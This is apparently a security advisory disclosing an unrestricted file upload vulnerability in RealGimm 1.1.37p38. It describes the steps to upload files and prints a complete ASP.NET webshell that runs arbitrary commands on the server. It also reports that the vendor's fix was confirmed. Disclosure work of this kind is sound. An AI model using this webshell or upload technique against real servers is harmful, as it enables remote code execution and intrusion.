An unrestricted file upload vunerability was found in RealGimm version 1.1.37p38. This vulnerability was eventually exploited to obtain remote command execution by uploading a webshell. What follows is a description of the steps taken to perform the exploit.
The vulnerable form can be found under the section patrimonio -> documentale -> gestione. When that link is clicked, the following pop-up window opens.
This feature can be used to manage and attach documents to certain database entities.
In order to exploit it, we first search for an immobile ID. Once having found one existing item, it is possible to attach a new version of a document by clicking the button highlighted in the following figure.
At this point, it is possible to upload a file and verify that the application does not perform any check over the file content that is uploaded. This means that it is possible to upload any malicious file type possible, including .aspx files.
All the files are uploaded into the following directory:
https://[RealGimm Host]/RealGimmWeb/Temp/Upload/<file_name>
We proceeded by uploading the following webshell (taken from here).
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
myProcessStartInfo.UseShellExecute = false
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xcmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","<")
mystring=replace(mystring,">",">")
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
End Sub
</script>
<html>
<body>
<form runat="server">
<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
<p><asp:Label id="result" runat="server"></asp:Label>
</form>
</body>
</html>
Eventually, we visited the uploaded file's URL and found our webshell ready to execute some code.
GruppoSCAI fixed the vulnerability. The fix was subsequently analyzed and was confirmed to be effective.
As a result of our testing, version 1.1.37p38 is considered to be affected by this vulnerability.
Francesco Mercatili
Paolo Caminati
Claudio Rimensi